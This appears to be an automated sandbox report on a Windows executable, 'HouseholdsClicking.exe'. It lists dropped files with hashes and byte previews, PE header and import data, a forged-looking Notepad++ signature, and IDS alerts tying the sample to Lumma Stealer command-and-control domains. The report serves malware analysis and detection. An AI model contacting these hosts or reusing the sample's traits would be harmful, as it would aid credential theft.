Preview:	....u.jbZRX..H...tJ..........E..H...................} ......$0f....P.u..u.j..A.P.n.......3....E..H.....[.....m.....O....} ......$0f....P.u..u.j..E..x.......$....x...........j0.u..u.j..p..p..p..........l...jd.Y..R.u...........a..................tD..........E..x.........x.........} .......0f......Q.u..u.j..p.......]..M ..`+J................}.3.VS.].WS.u.ja.u..X........u.............P...WSh.&J..:...V.u.WS.u.jb.u..".....(..t.WSh.&J......V.u.WS.u.je.u........(..t.WSh.&J......V.u.WS.u.jT.u........(....z...WSh.&J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.h.&J..l...S.u..u..u.j..u.......$.E..H...xC....>.u..E..u........./............E..H...x.......u..E..u.......................!..2......E..H....\|.....} ......$ f....P.u..u.j.Q.D....u..u.h.&J..\|.....w..b...t...p......H...tZH...tD...u..E..H.....w........n.....u.f..uu.j.Y.} ......$0f....P.u..u.j...u..u.h.&J.......u..u V..`+J........}..].WS.u.jI.u.................WSh.&J.......u VWS.u.jM.u........(...

C:\Users\user\AppData\Local\Temp\Lamp

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.451923499297437
Encrypted:	false
SSDEEP:	3072:4dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+3P:4gQaE/loUDtf0accB3gBmf
MD5:	F76D99915DAD5D1428306D84FD5CEF4A
SHA1:	07C609BC4E5206607858EB56A43C138AD172F3FB
SHA-256:	528C4E90EF35FCCFA8ACACCCC6A3A65BF753F211FB7ACC277527921606DD63C5
SHA-512:	9DA0F739147C67AB46BA8A896AF99A9CBE10B14B8725BDEBAFC6905DCF5252CC3588250D74A755C380F724E76F968909421858E16CE12075BE13709D1069C626
Malicious:	false
Preview:	$0.D$...........}..E....@.....L$,...\$x.............D$x.....F......N....=..M....#....<..Q.....C..C............9.A...A..UE...A...A.PVE..ZE...A...A...A...A...A.z.A.Z.A.(.A.\.A.\|.A...A...A.h.A...A.lWE.~XE..XE..XE.rYE.M.A...........................................................................................I...A.v.A...A..`E..bE.#cE..cE.8.A...A..YE.>.A...A..ZE.-ZE.M.A.............................................\|cE...A...A.GcE...A.gcE..cE..cE..cE..cE..cE.........U..VW.}...G..F....u....._^]...H...w..$.P.A..._..^]...j..~....W.........J..H..J..H..J..H._...F.^]....._..^]...j..F.........7.~..._..^]...j..+.........7...._..^]...j............7.Z..._..^]......A..dE...A...A...A...A...A..eE...A...A.UeE..eE..eE..eE.4.A.....U..U...T....R.S.].VW.....4...F.f..Ntx.].f..5...Q..f..G...Q...u.;.t5.F......%S...N.....=S.......IS..S...F........................vS...........iS..3._^[..]....E..@.......P...E........E......E......D...E.......@..E.A.......j...@..E..E.PV.u.........SO...U...........].....

C:\Users\user\AppData\Local\Temp\Leslie

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	30110
Entropy (8bit):	7.201013260715943
Encrypted:	false
SSDEEP:	768:cDv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:cDv7xvTphAiPChgZ2kOE6
MD5:	139ECBC61C65EEED2C66A743ABAC82D0
SHA1:	00B2C1A41006975E5D68EDEA5FCB3203A9F1333A
SHA-256:	6D0498EC0E7B86B819DD86A54CF13515E4EB50569AFF18C9FFC944EEFDA68251
SHA-512:	35C59717C001AC5A894ECB635072D8EEA157B8558E385B637C97493E35E3C4D962199D1799756A0D6C0A6310A327280F755564B9383ACADAB83DB7B02624F3C3
Malicious:	false
Preview:	.:.: ::4:?:G:K:Q:U:[:e:o:y:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.; ;$;;4;>;H;S;[;_;e;i;o;y;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<"<*<.<4<8<><H<R<\<g<o<s<y<}<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=+=6=>=B=H=L=R=\=f=p={=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>!>+>5>?>J>R>V>\>`>f>p>z>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?-?>?L?X?........]1.1.2?2l4.4O5.5.8.8.9.9.9p<.<.<.<.=-=9=A=I=Q=Y=a=i={=.=.=.=.=.=.=.=.=.=.=.=.=.>.> >2>D>]>v>.>.>G?T?_?j?y?.?.?.?.?.?.?.?.?.?.?......8....0.0.0!0,070I0T0_095G5^5j5s5.5.8.8;9.9.:[:.:.?......4....1g1r2.2.2.2.2.2.2.2.2.2.2.3.5.5!5+5.9#>3>;>....,....2.3M;Q<X<~<.<.<.<.<.<.<.<.<.<V=.?......`....1.3.4.4.4.5.5.5.5.5.5!5%5)5-5155595=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6.6.6.6!6%6)6-6165696=6A6E6I6M6Q6U6Y6]6a6e6i6m6q6u6y6}6.6.6.6.6.6.7.7.7Q9.;.;@<{<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=a>e>i>m>q>u>y>}>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.........0.0.0

C:\Users\user\AppData\Local\Temp\Replacing

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	6.348311128852535
Encrypted:	false
SSDEEP:	768:Cel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+9BGmd9OTGQG:Cel3EYrDWyu0uZo2+9BGmdATGV
MD5:	98D45275D84D549CF80B87BD0144D901
SHA1:	E321E6915F70857315778FDB7061D98E4B81A4E7
SHA-256:	48ED90918079AFCC3CB658F5898D643C864F2EFC7394FC7353D1CA83F19E7761
SHA-512:	5BA8EF5B24CBF770B3FC07F8251F5CB7BEAEABBD03879CCAA0E26A2E529446C8D72FC06A4A40DE39516C9DF4D893A3A60C682819521A3884FB62724C04A1E149
Malicious:	false
Preview:	..................h...............(...............(...........P...(............!..P............ ...............Y...............p...............k...............e.............. _..\............v..f............!..X...........8...............8...............x ...............................V..............8#..,.....................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............................................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.8.0.9.0.4.b.0...8.....C.o.m.p.a.n.y.N.a.m.e.....A.u.t.o.I.t. .T.e.a.m...b.%...C.o.m.m.e.n.t.s...h.t.t.p.:././.w.w.w...a.u.t.o.i.t.s.c.r.i.p.t...c.o.m./.a.u.t.o.i.t.3./.....X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....A.u.t.o.I.t. .v.3. .S.c.r.i.p.t. .(.B.e.t.a.)...8.....F.i.l.e.V.e.r.s.i.o.n.....3.,. .3.,. .1.5.,. .5...8.....I.n.t.e.r.n.a.l.N.a.m.e...A.u.t.o.I.t.3...e.x.e...z.+...L.e.g.a.l.C.o.p.y.r.i.g.h.t..... .1.9.9.9.-.2.0.2.1. .J.o.n.a.t.h.a.n. .B.e.n.n.e.t.t. .&. .A.u.t.o.I.t. .T.e.a.m.....@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...A.

C:\Users\user\AppData\Local\Temp\Roland

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998096501321864
Encrypted:	true
SSDEEP:	3072:jMSCHPzzMZFHsbM78XjkRVobAJ5Qdzyul+sC:MzmFM0skjVjQd5O
MD5:	DF8FDF5F14B162328C5A1C1A7D883B5A
SHA1:	69B6CFE2FBC4196E7F84A9E615E0AA845D5462E8
SHA-256:	0241AE98F5BC3D7BAF64427D3AF04029D8FB52362E95C0DA931B4A0FDDE5D13B
SHA-512:	177D290979EB7B5D1AA1F0660C98E0C4EF9A2949C32E327D0DE439E7B5889CD615830F47C350ED12511A9D58B1CE60299EDEEF64EAF36EA54DDF22E22E76E79B
Malicious:	false
Preview:	.$).....&.N......d.....C...u.....&..#.z...<}.....:..i.3,K.0s....(.R7aEp.&0.9@K.A.$,.D.5..s....D...0..............4KO...P....OI.......\.l>.......FT@~....t-.\ ........"aF[JQ....>e6^...N..28.....,....D..p..WFjCUir2......a..@Lc..hy./...t..._...{.<..N._...}....S..(.V........\..x..W....Nc..R.4.>...<.Q....[.b.ne...t.-....nMe...A..D..&.7.).....S.&....4.?..1...9-..d.c.2.[1.....=.m...........1..%e.Vx.<~....C5.Kn..3Of .K.M....h....f....q&.....@r.d.m.}R..k...r..V.&..A.....-.;KR...e.D..c.e.)....N.[nq.......w...S...^.C...Q.....+.yB......J..%...>.y?..x~.h..$.SC..~..u&.>a.=.A>..e...;.,.."N.+..."..h....%...Qq.s.NC...X4......ca..^\{...;&I.;b..K...;'...X.'.Hus..my.l".B`/. ...3..~.0K.:e.@.......$...W.;./.d1I2.3...\|....^(,Q.sC.\.3..Nf..V.7JQ.....t......q.:]..g.}..._.Z..o...P..2.@7.'54..0.:....:T.p.jM....Y..@..=Xv.....Q_... .\|`N.n...L..i.......J.%.m..Q.,.3Pw..j.(R...4[..;....76$.^?..............._23....r..G..'..0b7M.nlnZq?...;.j6.yz*<.&...}.Q..<;=].r\a

C:\Users\user\AppData\Local\Temp\Savage

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.664092486590779
Encrypted:	false
SSDEEP:	3072:Zmbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnF:gbfSCOMVIPPL/sZ7HS3zcNPF
MD5:	E1A20C475EC5F88B2F289C1E03D35848
SHA1:	12A23B096421755073A19D8F5FBFA031224852C8
SHA-256:	B64877AEADB747E805C85E4818FC3E667FC7107DFCDC5F3E20B819E1D559EFEF
SHA-512:	3FDBEF82EBD83DEADFA21D26516D0E4B2ECA75D1904AFCBB0E64D835D0E1A7CE2EEF03DAE1202321DEE7E30CB4DC556C040EC1038F8AE158F122B26826B98CB9
Malicious:	false
Preview:	.Y..P.u...Q....... .}....u+......?...k.0.....M..d.(...0.I.P.....Y.....W....I...uG..0.I...V.....Y......?...k.0W.....M..d.(...`.I............................u..E..@......E.u...W.3.E..iI...U.YY........U...?...k.0.U.....M..T.(......?...k.0.E.......M..D.).t..3.k.....Y..u(.E..E..P.u..u...j.Y...3........$..t....3.8~..Y............?...k.0.E......M..D.).........?k.0.....M..E....2D.-$.0D.-.E.Hu..E..t.......?...k.0.....M..L.( .u.......#.;........E..t..u...`.I.....E.......u.u.j.Y..P.u...s...... ...u2..0.I.P.V.........?...k.0.....M..d.(..3..I..Y..............?k.0.....M..T..3._^[..]..U..j..u..u..u..u..u.........]..U..QVW.=.......tN.}..tH.u..N...F..u.+..2....A..E...A..u.+M.;.v..<2=u.V.u.R..........t.....?.u.3._^..]..@....j.hH.L.......e..j..&%..Y.e...u..u..u..u..(.........u..E..................u.j..2%..Y..U..QS.].V..u..L...j.^.0.U......I.#..u.W.}...tA..tA..t.....u........Y..tM..A..E...A..u.+M.A....t4;.v!j"X_^[..]..t......j.^.0.........RVW..........u.3...3.PPPPP.......U..]..........

C:\Users\user\AppData\Local\Temp\Slideshow

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.042876042833136
Encrypted:	false
SSDEEP:	768:CKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/o:CKaj6iTcPAsAhxjgarB/o
MD5:	E3C619D6E998064E8E0B65361184EE91
SHA1:	E5DC3B5D5746E0BF1338E763F559E3478B970283
SHA-256:	4AE3270EA08C657550B1FA048E85E786C7E608BD243A2A6E4A6E70428202CA66
SHA-512:	32C1300C725C3B0C9494BBBBA2B0FC87FDD25487E7018F7EAC77115301656EC0AEFDEAFABDF875BCC655967CBEB71D6632FD6F88A4AD03FE9B68DC4F5C6B8831
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sv

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	707
Entropy (8bit):	4.199195082896046
Encrypted:	false
SSDEEP:	12:VEmtHyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1t:V9tHyGS9PvCA433C+sCNC1t
MD5:	FB5E6B5023C95D6B259E8A32C47E4188
SHA1:	DD075EF6C1E7161253E79224DAEC20831AFF4CC9
SHA-256:	61CA18D2F088E4AA315E0E989E6D0630C394765E655F567ED99EA53AD9E5F851
SHA-512:	7CF610141B7C93CCC7A2F5FA9953A14696A42A0135750C42FB02B4F6BF6BA76A6F5E32B8805FB465173C0D0F87501052E5082497B8E6F7FEA299CB6244512E8F
Malicious:	false
Preview:	Bookmarks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv

C:\Users\user\AppData\Local\Temp\Techno

Download File

Process:	C:\Users\user\Desktop\HouseholdsClicking.exe
File Type:	data
Category:	dropped
Size (bytes):	133120
Entropy (8bit):	5.76830886452573
Encrypted:	false
SSDEEP:	1536:PR8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPu:58QLeAg0Fuz08XvBNbjaAtsPu
MD5:	A2AD31B3B39D97E19767812F46D19EAD
SHA1:	E1F31BEAAC4E5C4FF16EBF916E7BF6A2CE2AD99A
SHA-256:	EE4DEDD77C361EC10B10B7A34F727528C0A8C90750088A2658424B8C1569DD5C
SHA-512:	7DB651D15B4612BE65BF8EC54AFF9A6F5C46964150E3AA96C9C656BFAF064B0C8FDD02E6C47C1EE54945B09061FEF395E4C31D027372A76941A91A547B84D5E5
Malicious:	false
Preview:	J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J.$.J.0.J.H.J.T.J.h.J...J...J...J...J...J.,.J.H.J.l.J...J...J...J...J...J...J...J. .J.(.J.4.J.D.J.`.J...J...J...J...J.$.J.@.J.d.J...J...J...J...J...J.N.J. .J.4.J.P.J.d.J...J.__based(....__cdecl.__pascal....__stdcall...__thiscall..__fastcall..__vectorcall....__clrcall...__eabi..__swift_1...__swift_2...__ptr64.__restrict..__unaligned.restrict(... new.... delete.=...>>..<<..!...==..!=..[]..operator....->.....++..--..-...+...&...->./...%...<...<=..>...>=..,...()..~...^...\|...&&..\|\|..*=..+=..-=../=..%=..>>=.<<=.&=..\|=..^=..`vftable'...`vbtable'...`vcall'.`typeof'....`local static guard'....`string'....`vbase destructor'..`vector deleting destructor'....`default constructor closure'...`scalar deleting destructor'....`vector constructor iterator'...`vector destructor iterator'....`vector vbase constructor iterator'.`virtual displacement map'..`eh vector constructor iterator'....`eh vector destructor iterator'.`eh vector vbase const

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9613420017471315
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HouseholdsClicking.exe
File size:	1'051'945 bytes
MD5:	c3c0fbe6393929c60e63885bab2603f6
SHA1:	09c0cb9efeaa8808710df3f47b3c56fcd323b8bd
SHA256:	2fbecbe7ba6ce56cfe6b6da8e7aaf6127755161a7ef340b7b20c2b061404f022
SHA512:	6d288c7fe70a1a5fc95347a86dff1ce7fed819e994e56be482383273f58d41ccafe2dfeb9b98d9d4250d58b02545cdc856a642549e1f5ef74b48110af701a37e
SSDEEP:	24576:tOwnvrCKVzzbzfafzs68PmgUFDWrE1X7BH/:jnTrJnEsNUFyM7Bf
TLSH:	D02523C2C9714537F28A0F3A75B4C34799BEECA88C75C0CA6720DB5D83219509F64B9B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

File Icon


Icon Hash:	04040c5834646c0c

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/05/2022 01:00:00 15/05/2025 00:59:59
Subject Chain	CN="Notepad++", O="Notepad++", L=Saint Cloud, S=Ile-de-France, C=FR
Version:	3
Thumbprint MD5:	15E2254C8FC88D4A538BA4FB09C0019E
Thumbprint SHA-1:	A731D48CD8E2A99BB91F7C096F40CEDF3A468BA6
Thumbprint SHA-256:	866B46DC0876C0B9C85AFE6569E49352A021C255C8E7680DF6AC1FDBAD677033
Serial:	03AA6492DE9D96A90A4BCA97BEADB44A

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F59D512ED0Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F59D512E9EDh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F59D512E9DBh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F59D512C2DAh
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F59D512E6B1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F59D512C363h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F59D512C2DAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x3dd6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xfe3d1	0x2958
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x3dd6	0x3e00	dd0bef767dd402b5e43760f872ba0825	False	0.3206275201612903	data	3.2491159454321363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0xfd6	0x1000	3be994507c33de1e64a3838e10ac6bda	False	0.597412109375	data	5.588401656476848	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1001f0	0xb94	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.003711201079622
RT_ICON	0x100d84	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.08665581773799837
RT_ICON	0x1033ec	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.22429078014184398
RT_DIALOG	0x103854	0x100	data	English	United States	0.5234375
RT_DIALOG	0x103954	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x103a70	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x103ad0	0x30	data	English	United States	0.875
RT_MANIFEST	0x103b00	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T12:06:21.870440+0100	2058612	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)	1	192.168.2.4	51002	1.1.1.1	53	UDP
2025-01-10T12:06:21.882584+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	64889	1.1.1.1	53	UDP
2025-01-10T12:06:21.894226+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	60520	1.1.1.1	53	UDP
2025-01-10T12:06:21.905518+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	61330	1.1.1.1	53	UDP
2025-01-10T12:06:21.917168+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	54680	1.1.1.1	53	UDP
2025-01-10T12:06:21.934811+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	64453	1.1.1.1	53	UDP
2025-01-10T12:06:21.950791+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	50919	1.1.1.1	53	UDP
2025-01-10T12:06:21.962806+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	53762	1.1.1.1	53	UDP
2025-01-10T12:06:21.975796+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	53765	1.1.1.1	53	UDP
2025-01-10T12:06:22.661289+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.102.49.254	443	TCP
2025-01-10T12:06:23.171566+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49737	104.102.49.254	443	TCP
2025-01-10T12:06:23.771159+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.64.1	443	TCP
2025-01-10T12:06:24.232789+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49738	104.21.64.1	443	TCP
2025-01-10T12:06:24.232789+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.64.1	443	TCP
2025-01-10T12:06:24.707840+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-10T12:06:25.177022+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-10T12:06:25.177022+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-10T12:06:25.928436+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.64.1	443	TCP
